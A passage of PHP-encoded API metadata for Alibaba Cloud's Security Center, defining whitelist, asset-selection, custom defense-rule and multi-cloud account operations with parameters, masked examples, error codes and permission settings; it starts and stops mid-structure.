'ListAvailableHoneypot', 'ListBackupRecord', 'ListCheckRuleInstance', 'ListCheckTypes', 'ListClientAlertMode', 'ListCloudVendorRegions', 'ListClusterPluginInfo', 'ListCriteriaStrategy', 'ListFileProtectRule', 'ListHoneypotAlarmEvents', 'ListHoneypotNode', 'ListHoneypotPreset', 'ListImageBuildRiskItem', 'ListInstanceRiskLevels', 'ListInstanceRiskNum', 'ListInterceptionRulePage', 'ListOperationCheck', 'ListRdDefaultSyncList', 'ListRuleTargetAll', 'ModifyAppVulScanCycle', 'ModifyAttestor', 'ModifyClientConfSetup', 'ModifyClientConfStrategy', 'ModifyCloudVendorTrialConfig', 'ModifyClusterCnnfStatusUserConfirm', 'ModifyDingTalkStatus', 'ModifyLoginSwitchConfig', 'ModifyOperateVul', 'ModifyPropertyScheduleConfig', 'ModifyRefreshProcessInfo', 'ModifySecurityCheckScheduleConfig', 'ModifySecurityEventMarkMissIndividually', 'ModifyStrategy', 'ModifyStrategyTarget', 'ModifyTagWithUuid', 'ModifyVpcHoneyPot', 'ModifyVulWhitelistTarget', 'ModifyWebLockRefresh', 'ModifyWebPath', 'OperateAgentClientInstall', 'OperateApplication', 'OperateBucketScanTask', 'OperateCommonOverallConfig', 'OperateSuspiciousTargetConfig', 'OperationCancelIgnoreSuspEvent', 'PauseClient', 'PublicPreCheckImageScanTask', 'PublicSyncAndCreateImageScanTask', 'QueryDiscoverDatabase', 'QueryGroupedSecurityEventMarkMissList', 'RefreshAssets', 'RefreshRegistryToken', 'ResetHoneypot', 'ResetLogShipper', 'RetryInstallProbe', 'RollbackSuspEventQuaraFile', 'SasInstallCode', 'SaveSuspEventUserSetting', 'SaveWhiteListStrategy', 'SaveWhiteListStrategyAssets', 'SetClusterInterceptionConfig', 'SetImageSensitiveFileStatus', 'SetRegistryScanDayNum', 'SetSensitiveDefineRuleConfig', 'StartDiscoverDatabaseTask', 'StartHoneypot', 'StartIdcProbeScan', 'StartPreCheckDatabase', 'StartVirusScanTask', 'StopHoneypot', 'SubmitTenantCheck', 'TriggerCheck', 'UninstallBackupClient', 'UninstallUniBackupAgent', 'UpdateAlarmEvent', 'UpdateAttackPathWhitelist', 'UpdateCheckScopeConfig', 'UpdateClientAlertMode', 'UpdateFileProtectRule', ], 'title' => 'Others', 'type' => 'directory', ], ], 'components' => [ 'schemas' => [ 'QueryIncidentTracingSubNodesCountRequest' => [ 'title' => '', 'description' => 'Sub-node query request instance', 'type' => 'object', 'properties' => [ 'VertexIdAndTypeList' => [ 'title' => '', 'description' => 'List of key-value pairs composed of node IDs and types, where key-value pairs exist in the form of arrays', 'type' => 'array', 'items' => [ 'description' => 'A two-dimensional array composed of node ID and node type, where the first element is the node ID and the second element is the node type', 'type' => 'array', 'items' => ['description' => 'Node ID or node type, string', 'type' => 'string', 'example' => '["vertex1", "vertexType1"]', 'title' => ''], 'title' => '', 'example' => '', ], 'example' => '', ], ], 'example' => '', ], ], ], 'apis' => [ 'AddAssetSelectionCriteria' => [ 'summary' => 'Select an operation for assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '168455', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SelectionKey', 'in' => 'query', 'schema' => ['description' => 'The unique ID of the asset.'."\n", 'type' => 'string', 'required' => true, 'example' => '5196d280-5bfa-496a-ba70-8a3935e3****', 'title' => ''], ], [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The search conditions that are used to query assets. The value of this parameter is in the JSON format and is case-sensitive.'."\n" ."\n" .'> A search condition can be an instance ID, instance name, virtual private cloud (VPC) ID, region, or public IP address. You can call the [DescribeCriteria](~~DescribeCriteria~~) operation to query the supported search conditions.'."\n", 'type' => 'string', 'required' => false, 'example' => '{"LogicalExp":"AND","Criteria":"[{\\"name\\":\\"osType\\",\\"value\\":\\"linux\\",\\"logicalExp\\":\\"AND\\"},{\\"name\\":\\"alarmStatus\\",\\"value\\":\\"YES\\",\\"logicalExp\\":\\"AND\\"}]"}', 'title' => ''], ], [ 'name' => 'CriteriaOperation', 'in' => 'query', 'schema' => ['description' => 'The type of the operation on search conditions. Valid values:'."\n" ."\n" .'* **add**: adds assets.'."\n" .'* **del**: deletes assets.'."\n", 'type' => 'string', 'required' => false, 'example' => 'add', 'title' => ''], ], [ 'name' => 'TargetOperationList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of assets.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Target' => ['description' => 'The ID of the asset.'."\n", 'type' => 'string', 'required' => false, 'example' => '1188****', 'title' => ''], 'Operation' => ['description' => 'The type of the operation. Valid values:'."\n" ."\n" .'* **add**'."\n" .'* **del**'."\n", 'type' => 'string', 'required' => false, 'example' => 'del', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\"\\n}","type":"json"}]', 'title' => 'AddAssetSelectionCriteria', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddAssetSelectionCriteria'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddAssetSelectionCriteria', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'AddBaselineCheckWhiteRecord' => [ 'summary' => 'Creates a whitelist rule for a baseline check item.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '196375', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The data source. If you leave this parameter empty, the default value is used. Valid values:'."\n" ."\n" .'* **default**: server'."\n" .'* **agentless**: agentless detection'."\n", 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [ListCheckItemWarningSummary](~~ListCheckItemWarningSummary~~) operation to query the IDs of check items.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '76', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The type of the assets on which the whitelist rule takes effect. Valid values:'."\n" ."\n" .'* **all_instance**: all servers'."\n" .'* **instance**: specific servers'."\n", 'type' => 'string', 'required' => false, 'example' => 'instance', 'title' => ''], ], [ 'name' => 'Reason', 'in' => 'query', 'schema' => ['description' => 'The reason why the check item is added to the whitelist.'."\n", 'type' => 'string', 'required' => false, 'example' => '无效', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RecordId' => ['description' => 'The ID of the whitelist rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '864153', 'title' => ''], 'CheckId' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [ListCheckItemWarningSummary](~~ListCheckItemWarningSummary~~) operation to query the IDs of check items.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '76', 'title' => ''], 'TargetType' => ['description' => 'The type of the assets on which the whitelist rule takes effect. Valid values:'."\n" ."\n" .'* **all_instance**: all servers'."\n" .'* **instance**: specific servers'."\n", 'type' => 'string', 'example' => 'instance', 'title' => ''], 'Target' => ['description' => 'The object that is added to the whitelist.'."\n", 'type' => 'string', 'example' => 'HOST_BASELINE_WHITE_LIST_21', 'title' => ''], 'Reason' => ['description' => 'The reason why the check item is added to the whitelist.'."\n", 'type' => 'string', 'example' => '暂时忽略', 'title' => ''], 'Source' => ['description' => 'The data source. Valid values:'."\n" ."\n" .'* **default**: server'."\n" .'* **agentless**: agentless detection'."\n", 'type' => 'string', 'example' => 'agentless', 'title' => ''], 'Lang' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'example' => 'zh', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DD****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"RecordId\\": 864153,\\n \\"CheckId\\": 76,\\n \\"TargetType\\": \\"instance\\",\\n \\"Target\\": \\"HOST_BASELINE_WHITE_LIST_21\\",\\n \\"Reason\\": \\"暂时忽略\\",\\n \\"Source\\": \\"agentless\\",\\n \\"Lang\\": \\"zh\\"\\n },\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DD****\\"\\n}","type":"json"}]', 'title' => 'AddBaselineCheckWhiteRecord', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddBaselineCheckWhiteRecord'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddBaselineCheckWhiteRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'AddCheckInstanceResultWhiteList' => [ 'summary' => 'Adds instances on which risks are detected based on check items of the configuration assessment feature to a whitelist.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '119347', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckGroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the group to which the check item belongs.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cQFq20UzZ49K6gRSJD1301****', 'title' => ''], ], [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [ListCheckResult](~~ListCheckResult~~) operation to query the IDs of check items.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '132', 'title' => ''], ], [ 'name' => 'InstanceIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The instance IDs of the assets.'."\n", 'type' => 'array', 'items' => ['description' => 'The instance ID of the asset.'."\n" ."\n" .'> You can call the [ListCheckInstanceResult](~~ListCheckInstanceResult~~) operation to query the instance IDs of assets.'."\n", 'type' => 'string', 'required' => false, 'example' => 'rr-uf69i5n62hyqu****', 'title' => ''], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'InstanceList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The asset instances.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the asset instance.'."\n", 'type' => 'object', 'properties' => [ 'RegionId' => ['description' => 'The region ID of the asset.'."\n" ."\n" .'> You can call the [ListCheckInstanceResult](~~ListCheckInstanceResult~~) operation to query the region ID of the asset.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cn-hongkong', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the asset.'."\n" ."\n" .'> You can call the [ListCheckInstanceResult](~~ListCheckInstanceResult~~) operation to query the instance IDs of assets.'."\n", 'type' => 'string', 'required' => false, 'example' => 'i-wz9fdluqx20mp2x7****', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleType', 'in' => 'query', 'schema' => ['description' => 'The type of the rule. Default value: **WHITE**. Valid value:'."\n" ."\n" .'* WHITE: adds check items to the whitelist.'."\n", 'type' => 'string', 'required' => false, 'example' => 'WHITE', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The description. The value of this parameter can be up to 65,535 bytes in length.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'AddCheckInstanceResultWhiteListResponse', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The data returned. This parameter is deprecated.'."\n", 'type' => 'object', 'example' => 'xxx', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => 'ADE57832-9666-511C-9A80-B87DE2E8****', 'title' => ''], 'RuleId' => ['description' => 'The ID of the whitelist rule.'."\n", 'type' => 'string', 'example' => '381049', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"test\\": \\"test\\",\\n \\"test2\\": 1\\n },\\n \\"RequestId\\": \\"ADE57832-9666-511C-9A80-B87DE2E8****\\",\\n \\"RuleId\\": \\"381049\\"\\n}","type":"json"}]', 'title' => 'AddCheckInstanceResultWhiteList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddCheckInstanceResultWhiteList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddCheckInstanceResultWhiteList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'AddCheckResultWhiteList' => [ 'summary' => 'Adds the check items of the configuration assessment feature to the whitelist.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '119341', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'CheckIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the check items.'."\n" ."\n" .'> You can call the [ListCheckResult](~~ListCheckResult~~) operation to query the IDs of the check items.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [ListCheckResult](~~ListCheckResult~~) operation to query the IDs of the check items.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '152', 'title' => ''], 'required' => false, 'maxItems' => 50, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleType', 'in' => 'query', 'schema' => ['description' => 'The type of the rule. Default value: **WHITE**. Valid value:'."\n" ."\n" .'* **WHITE**: Add check items to the whitelist.'."\n", 'type' => 'string', 'required' => false, 'example' => 'WHITE', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The description. The value of this parameter can be up to 65,535 bytes in length.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'InstanceIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'IDs of the cloud product instances that need to be whitelisted. Separate multiple IDs with a comma (,).', 'type' => 'array', 'items' => ['description' => 'The cloud product instance ID that needs to be whitelisted.', 'type' => 'string', 'required' => false, 'example' => 'i-2ze3a5ws0mjvqwqr****', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'AddCheckResultWhiteListResponse', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The data returned. This parameter is deprecated.'."\n", 'type' => 'object', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'C699E4E4-F2F4-58FC-A949-457FFE59****', 'title' => ''], 'RuleIds' => [ 'description' => 'The IDs of the whitelist rules that are generated.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the whitelist rule that is generated.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '7788', 'title' => ''], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": 1,\\n \\"RequestId\\": \\"C699E4E4-F2F4-58FC-A949-457FFE59****\\",\\n \\"RuleIds\\": [\\n 7788\\n ]\\n}","type":"json"}]', 'title' => 'AddCheckResultWhiteList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddCheckResultWhiteList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddCheckResultWhiteList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'translator' => 'machine', ], 'AddClientUserDefineRule' => [ 'summary' => 'Create a custom defense rule.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91897', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the custom defense rule.'."\n", 'type' => 'string', 'required' => true, 'example' => '规则1', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the custom defense rule. Valid values:'."\n" ."\n" .'* **1**: Process hash'."\n" .'* **2**: Command line'."\n" .'* **3**: Process Network'."\n" .'* **4**: File Read and Write'."\n" .'* **5**: Operation on Registry'."\n" .'* **6**: Dynamic-link Library Loading'."\n" .'* **7**: File Renaming'."\n" .'* **8**: Network domain name'."\n" .'* **9**: Network ip'."\n" .'* **10**: File Path', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'Md5List', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The hash values of processes.'."\n", 'type' => 'string', 'required' => false, 'example' => '0c9045b5bec90f9825f1f3f64dd4****', 'title' => ''], ], [ 'name' => 'ActionType', 'in' => 'query', 'schema' => ['description' => 'The action of the custom defense rule. Valid values:'."\n" ."\n" .'* **0**: allow'."\n" .'* **1**: block'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'ProcPath', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The path to the process.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c:/windows/system32/i****', 'title' => ''], ], [ 'name' => 'Cmdline', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The command line.'."\n", 'type' => 'string', 'required' => false, 'example' => '/usr/sbin/s****', 'title' => ''], ], [ 'name' => 'Platform', 'in' => 'query', 'schema' => ['description' => 'The type of the operating system. Valid values:'."\n" ."\n" .'* **windows**: Windows'."\n" .'* **linux**: Linux'."\n" .'* **all**: all types'."\n", 'type' => 'string', 'required' => false, 'example' => 'linux', 'title' => ''], ], [ 'name' => 'IP', 'in' => 'query', 'schema' => ['description' => 'The IP address.'."\n", 'type' => 'string', 'required' => false, 'example' => '10.240.XX.XX', 'title' => ''], ], [ 'name' => 'Port', 'in' => 'query', 'schema' => ['description' => 'The port number. This parameter is deprecated.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '22', 'title' => ''], ], [ 'name' => 'FilePath', 'in' => 'query', 'schema' => ['description' => 'The file path.'."\n", 'type' => 'string', 'required' => false, 'example' => '/etc/pam****', 'title' => ''], ], [ 'name' => 'RegistryKey', 'in' => 'query', 'schema' => ['description' => 'The registry key.'."\n", 'type' => 'string', 'required' => false, 'example' => 'HKEY_DYN_****', 'title' => ''], ], [ 'name' => 'RegistryContent', 'in' => 'query', 'schema' => ['description' => 'The registry value.'."\n", 'type' => 'string', 'required' => false, 'example' => '*SECOH-QAD.exe*', 'title' => ''], ], [ 'name' => 'NewFilePath', 'in' => 'query', 'schema' => ['description' => 'The new file path after the file is renamed.'."\n", 'type' => 'string', 'required' => false, 'example' => '/etc/pam****', 'title' => ''], ], [ 'name' => 'ParentProcPath', 'in' => 'query', 'schema' => ['description' => 'The path to the parent process.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c:/windows/system32/i****', 'title' => ''], ], [ 'name' => 'ParentCmdline', 'in' => 'query', 'schema' => ['description' => 'The parent command line.'."\n", 'type' => 'string', 'required' => false, 'example' => '/usr/sbin/s****', 'title' => ''], ], [ 'name' => 'PortStr', 'in' => 'query', 'schema' => ['description' => 'The port number. Valid values: **1 to 65535**.'."\n", 'type' => 'string', 'required' => false, 'example' => '80', 'title' => ''], ], [ 'name' => 'Domain', 'in' => 'query', 'schema' => ['description' => 'The domain name.'."\n", 'type' => 'string', 'required' => false, 'example' => 'example.com', 'title' => ''], ], [ 'name' => 'TargetDefault', 'in' => 'query', 'schema' => ['description' => 'Whether machines are automatically added to the rule. Default value: add. Valid values: '."\n" ."\n" .'- **add**: Added by default '."\n" .'- **del**: Not added by default ', 'type' => 'string', 'required' => false, 'example' => 'add', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => '32A73759-4C0F-4801-BE98-901223ACEE9A', 'title' => ''], 'UserDefineRuleAddResult' => [ 'description' => 'The identifier of the custom defense rule.'."\n", 'type' => 'object', 'properties' => [ 'SwitchId' => ['description' => 'The switch ID of the custom defense rule.'."\n", 'type' => 'string', 'example' => 'USER-DEFINE-RULE-SWITCH-TYPE_200****', 'title' => ''], 'Id' => ['description' => 'The ID of the rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'Platform' => ['description' => 'The type of the operating system. Valid values:'."\n" ."\n" .'* **windows**: Windows'."\n" .'* **linux**: Linux'."\n" .'* **all**: all types'."\n", 'type' => 'string', 'example' => 'linux', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InvalidPlatform', 'errorMessage' => 'Invalid Platform value.', 'description' => ''], ['errorCode' => 'InvalidUserDefineRuleName', 'errorMessage' => 'Invalid Name value.', 'description' => ''], ['errorCode' => 'UserDefineRuleNameTooLong', 'errorMessage' => 'User define rule name too long.', 'description' => ''], ['errorCode' => 'InvalidUserDefineRuleActionType', 'errorMessage' => 'Invalid ActionType value.', 'description' => ''], ['errorCode' => 'InvalidUserDefineRuleType', 'errorMessage' => 'Invalid Type value.', 'description' => ''], ['errorCode' => 'InvalidUserDefineRuleMd5List', 'errorMessage' => 'Invalid Md5List value.', 'description' => ''], ['errorCode' => 'UserDefineRuleMd5TooMany', 'errorMessage' => 'Too many user define rule md5s.', 'description' => ''], ['errorCode' => 'InvalidProcPath', 'errorMessage' => 'Process path is invalid.', 'description' => ''], ['errorCode' => 'UserDefineRuleProcPathMustContainsLetter', 'errorMessage' => 'User define rule process path must contain letter.', 'description' => ''], ['errorCode' => 'InvalidUserDefineRuleProcPath', 'errorMessage' => 'User define rule process path is invalid.', 'description' => ''], ['errorCode' => 'InvalidCmdline', 'errorMessage' => 'Command line is invalid.', 'description' => ''], ['errorCode' => 'UserDefineRuleCmdlineTooLong', 'errorMessage' => 'User define rule command line too long.', 'description' => ''], ['errorCode' => 'InvalidIP', 'errorMessage' => 'Invalid IP value.', 'description' => ''], ['errorCode' => 'InvalidPort', 'errorMessage' => 'Invalid PortStr value.', 'description' => ''], ['errorCode' => 'InvalidFilePath', 'errorMessage' => 'Invalid FilePath value.', 'description' => ''], ['errorCode' => 'UserDefineRuleFilePathTooLong', 'errorMessage' => 'User define rule file path too long.', 'description' => ''], ['errorCode' => 'UserDefineRulesTooMany', 'errorMessage' => 'Too many rules.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"32A73759-4C0F-4801-BE98-901223ACEE9A\\",\\n \\"UserDefineRuleAddResult\\": {\\n \\"SwitchId\\": \\"USER-DEFINE-RULE-SWITCH-TYPE_200****\\",\\n \\"Id\\": 1,\\n \\"Platform\\": \\"linux\\"\\n }\\n}","type":"json"}]', 'title' => 'Add a custom rule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddClientUserDefineRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddClientUserDefineRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'translator' => 'machine', ], 'AddCloudVendorAccountAK' => [ 'summary' => 'Adds the configuration information of multi-cloud assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91898', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'The cloud service provider. Valid values:'."\n" ."\n" .'* **Tencent**: Tencent Cloud'."\n" .'* **HUAWEICLOUD**: Huawei Cloud'."\n" .'* **Azure**: Microsoft Azure'."\n" .'* **AWS**: Amazon Web Services (AWS)'."\n", 'type' => 'string', 'required' => true, 'example' => 'AWS', 'title' => ''], ], [ 'name' => 'AkType', 'in' => 'query', 'schema' => ['description' => 'The type of the account to which the AccessKey pair belongs. Valid values:'."\n" ."\n" .'* **primary**: a primary account'."\n" .'* **sub**: a sub-account'."\n", 'type' => 'string', 'required' => true, 'example' => 'primary', 'title' => ''], ], [ 'name' => 'SecretId', 'in' => 'query', 'schema' => ['description' => 'The AccessKey ID. Valid values:'."\n" ."\n" .'1\\. If AkType is set to primary, specify this parameter based on the following description:'."\n" ."\n" .'* **Tencent**: Enter the AccessKey ID of a primary account on Tencent Cloud.'."\n" .'* **HUAWEICLOUD**: Enter the 